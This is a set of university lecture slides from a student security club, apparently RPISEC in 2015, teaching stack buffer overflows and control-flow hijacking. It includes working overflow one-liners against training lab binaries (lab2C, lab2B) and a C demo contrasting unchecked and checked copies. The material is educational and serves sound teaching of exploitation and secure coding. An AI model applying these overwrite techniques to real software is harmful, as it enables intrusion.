Security & Exploitation
1 Security & Exploitation Operating Systems Spring 2015 RPISEC - 05/11/2015 OS Security 1
2 whoami
- Markus Gaasedelen
- B.S. Computer Science '15
- Security Enthusiast
- I like to hack things
- President of RPISEC
3 What is RPISEC?
- The Computer Security RPI
- The leading authority on campus for any and all things computer security related
- We compete in hacking competitions known as CTFs (Capture The Flag) and we're very good at them
4-5 CSAW 2014 Finals
6 CSAW 2014 Awards
7 What is RPISEC?
- The Computer Security RPI
- The leading authority on campus for any and all things computer security related
- We compete in hacking competitions known as CTFs (Capture The Flag) and we're very good at them
- We teach cool and applicable security skills at our weekly meetings
- 5-7pm Fridays, DCC 324
8 Weekly Meetings
9 let's get rolling: WHAT IS SECURITY?
11 What is Security?
- Security == Hacking politically correct
- Cyber is the buzzword
- Very technical and rewarding challenges
- Rarely touched upon in academia
- Many different categories of security
12-13 Categories of Security
- Cryptography, Web Security, Vulnerability Research, Binary Exploitation, Reverse Engineering, Malware Analysis, Systems Security, Embedded Hardware Hacking, Network Security, Digital Forensics, Physical Security, Pentesting
- (slide 13) The kind of stuff I'll talk about today
14 MEMORY CORRUPTION & BINARY EXPLOITATION
15 Defining Binary Exploitation
- Binary Exploitation: Carefully leveraging bugs in an application to cause extreme but controlled failure
16-18 Binary Exploitation
- extreme but controlled failure
- But what does that even mean?
19-23 Visualizing Exploitation
24 Visualizing Exploitation
- wat
25 Super Mario World Silliness
26 Defining Binary Exploitation
- Binary Exploitation: Carefully leveraging bugs in an application to cause extreme but controlled failure
- Exploitation requires intimate knowledge of the language, compiler, and the machine
27 Language Pyramid
28-30 The Unexciting Languages
- Binary exploitation isn't really a thing for managed or scripting languages
- C#, .NET, JavaScript, Lua, Python, etc
- Slower, automates a lot of stuff for you
- Driving an automatic
31-35 The C Language
- C is a low level language
- Compiles straight to machine code
- Very fast
- Very fine control over the machine and memory
- It's like driving a manual!
- Easy to do stupid things
37 Going Deeper
38 Pulling Back the Curtain
there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead.
-Cypher, The Matrix
39 let's dive right in and try breaking some stuff: WELCOME TO THE WARZONE
40 warzone.rpis.ec
- ssh
- username/password lab2c /
41 Getting Started / Tips
    cd /levels/lab2
    ./lab2c AAAA
    python -c 'print "A"*20'
    gdb ./lab2c
    run
  In GDB:
    info functions
    info registers: i r
    disassemble <function>: disas main
    breakpoint <function>: b main
    breakpoint * <address>: b * 0x
42 Stack Overview
- The stack is a region of memory for a program to maintain function variables, arguments, and control flow metadata during execution
43-44 Understanding the Stack
45 Corrupting the Stack
46 PWNING the Stack
47 Endianness
- Endianness: How data is stored in memory
- Modern computers are generally little endian
- little end in
- Endianness can be confusing, and I don't want to get into the details
- 0x stored as 0x44, 0x43, 0x42, 0x41
- 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
48 lab2c Exploit
    ./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"')
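Why the last four bytes on the lab2c slide are written least-significant byte first, as an added example (not code from the slides or from the lab2c binary): it models a 15-byte buffer placed directly below a 32-bit variable, and shows an unchecked copy changing that variable while a length-checked copy rejects the same input. The frame layout and the names load_le32, unchecked_copy, checked_copy and SAMPLE are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   15              /* same size as the 15 filler bytes on the slide */
#define FRAME_LEN (BUF_LEN + 4)   /* buffer followed directly by a 32-bit variable */

/* Hypothetical stand-in for a stack frame: bytes 0..14 are the buffer,
 * bytes 15..18 hold the neighbouring variable. A flat byte array keeps the
 * demonstration well defined on any host. */
struct frame {
    unsigned char mem[FRAME_LEN];
};

/* Decode four bytes the way a little-endian CPU such as x86 reads them. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void frame_init(struct frame *f)
{
    memset(f->mem, 0, sizeof f->mem);   /* the variable starts at 0 */
}

static uint32_t frame_var(const struct frame *f)
{
    return load_le32(f->mem + BUF_LEN);
}

/* The bug class: the copy length comes from the input, not from the buffer.
 * The clamp to FRAME_LEN only keeps this demonstration inside its own array.
 * Returns the neighbouring variable's value after the copy. */
uint32_t unchecked_copy(const unsigned char *in, size_t n)
{
    struct frame f;
    frame_init(&f);
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(f.mem, in, n);
    return frame_var(&f);
}

/* The fix: refuse anything that does not fit the buffer.
 * Returns 0 on success, -1 when the input is rejected; *var_out receives the
 * neighbouring variable's value either way. */
int checked_copy(const unsigned char *in, size_t n, uint32_t *var_out)
{
    struct frame f;
    frame_init(&f);
    if (n > BUF_LEN) {
        *var_out = frame_var(&f);
        return -1;
    }
    memcpy(f.mem, in, n);
    *var_out = frame_var(&f);
    return 0;
}

/* Constructed sample input: 15 filler bytes, then 0xdeadbeef as it sits in
 * little-endian memory (0xef, 0xbe, 0xad, 0xde). */
static const unsigned char SAMPLE[] = "AAAAA" "AAAAA" "AAAAA" "\xef\xbe\xad\xde";
#define SAMPLE_LEN (sizeof SAMPLE - 1)

int main(void)
{
    uint32_t v = 0;
    int rc;

    printf("unchecked copy, %u bytes: variable = 0x%08x\n",
           (unsigned)SAMPLE_LEN, (unsigned)unchecked_copy(SAMPLE, SAMPLE_LEN));

    rc = checked_copy(SAMPLE, SAMPLE_LEN, &v);
    printf("checked copy,   %u bytes: rc = %d, variable = 0x%08x\n",
           (unsigned)SAMPLE_LEN, rc, (unsigned)v);
    return 0;
}
```

In real code the same check is what bounded interfaces such as snprintf enforce, provided the size passed is the destination's size and not the input's.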
49 Bend it like Beckham: UNDERSTANDING CONTROL FLOW
50-61 Example ELF / EXE in Memory (diagram)
Runtime Memory:
- 0x Start of memory
- Libraries (libc)
- ELF Executable: .text segment (0x Start of .text Segment), .data segment
- Heap
- Stack (0xbfff0000 Top of stack)
- 0xFFFFFFFF End of memory
Labels on slides 51-61: Executable code, EIP
62-67 How Calling Works (EIP)
68-72 Returning (EIP)
73 Now that you know how it works: OWNING CONTROL FLOW
74-76 Stack Smashing (EIP)
77 Returning (EIP)
78 Returning home
- EIP
- SEGFAULT 0x
80 If your program simply segfaulted, consider yourself lucky. -Chuck Stewart
81 Redirecting Control Flow
- Overwrite with a code address
- EIP
82 warzone.rpis.ec
- SSH in as lab2b
- use the password you got from solving lab2c
84 lab2b Exploit
    ./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"')
85 Modern Protections
- Data Execution Prevention (DEP)
- Address Space Layout Randomization (ASLR)
- Stack Cookies (Canaries)
- Read Only Relocation (RELRO)
- FORTIFY_SOURCE
- These only make things harder, not impossible
86 Those were more academic challenges: BREAKING SOMETHING MODERN
87 Exploitation on Windows 8.1 (x64): CSAW 2014 LINKS.EXE
88 links.exe
- Challenge from the CSAW 2014 CTF Finals
- 64bit exploitation on Windows 8.1
- Basically all protections are on by default
- No source code, lots of x64 reversing
- Doubly linked circular list implementation
- pushfront, pushback, delete, copy, print, sort
89 reversing is tedious
90 Windows 8.1 Exploitation (x64): CSAW 2014 LINKS.EXE - DEMO
91 CSAW 2014 Finals
92 Wrapping up Binary Exploitation
- You might consider yourself a *rockstar* programmer, but you probably know little to nothing about secure coding practices or the implications of your mistakes
- Compilers go out of their way to prevent your bugs from causing catastrophic failure
- Because your program doesn't appear to segfault or crash, doesn't mean it is bug free or without vulnerabilities
- Binary exploitation is nothing like standard software development - I truly think of it as an art
93 welcome to the real world: JOB OPPORTUNITIES
94 so many jobs
- Typical titles / positions: Information Security Analyst / Engineer, Security Software Engineer, Vulnerability Research Engineer, Web Application Security Engineer, Computer Network Operations, Threat & Incident Response Engineer, Product Security Reverse Engineer, Malware Analyst / Reverse Engineer
95 Entering the Job Market
- There is a major shortage of qualified security individuals in industry
- Skilled in security & have a B.S. in CS?
- Government, Contractors, FFRDCs $70k - $100k
- Private / Commercial $100k??
- Anything less and you're missing out
96 One Great Adventure
97 RPI
98 RPI
- Malware Analysis Fall 2015 Coming soon!
- Modern Binary Exploitation Spring
- Hardware Reverse Engineering Spring
- Malware Analysis Spring
- Secure Software Principles Spring
99 Questions?
- gaasem [at] rpi.edu
- irc.rpis.ec 6667
